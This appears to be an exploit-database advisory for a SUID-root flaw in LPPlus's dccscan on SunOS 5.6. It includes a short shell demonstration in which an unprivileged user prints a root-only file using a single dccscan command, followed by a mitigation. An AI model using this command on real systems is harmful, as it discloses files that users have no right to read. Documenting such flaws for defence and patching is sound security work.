$LPHOME/bin/dccscan SUID-Root Vulnerability

vendor:

SunOS 5.6

by:

SecurityFocus

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: SunOS 5.6

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix

2002

$LPHOME/bin/dccscan SUID-Root Vulnerability

$LPHOME/bin/dccscan is suid-root and can be executed by any user. It is possible for an unprivileged user to print files to which he does not have read access. In testing, this works even for printers to which the user is is not given any access in the LPPlus security configuration.

Mitigation:

Ensure that the $LPHOME/bin/dccscan is not set to suid-root.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1644/info

$LPHOME/bin/dccscan is suid-root and can be executed by any user. It is possible for an unprivileged user to print files to which he does not have read access. In testing, this works even for printers to which the user is is not given any access in the LPPlus security configuration.

# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$

# now, go to the printer and wait for the files to come out, or watch them 
# being queued as root, if you have access to dccstat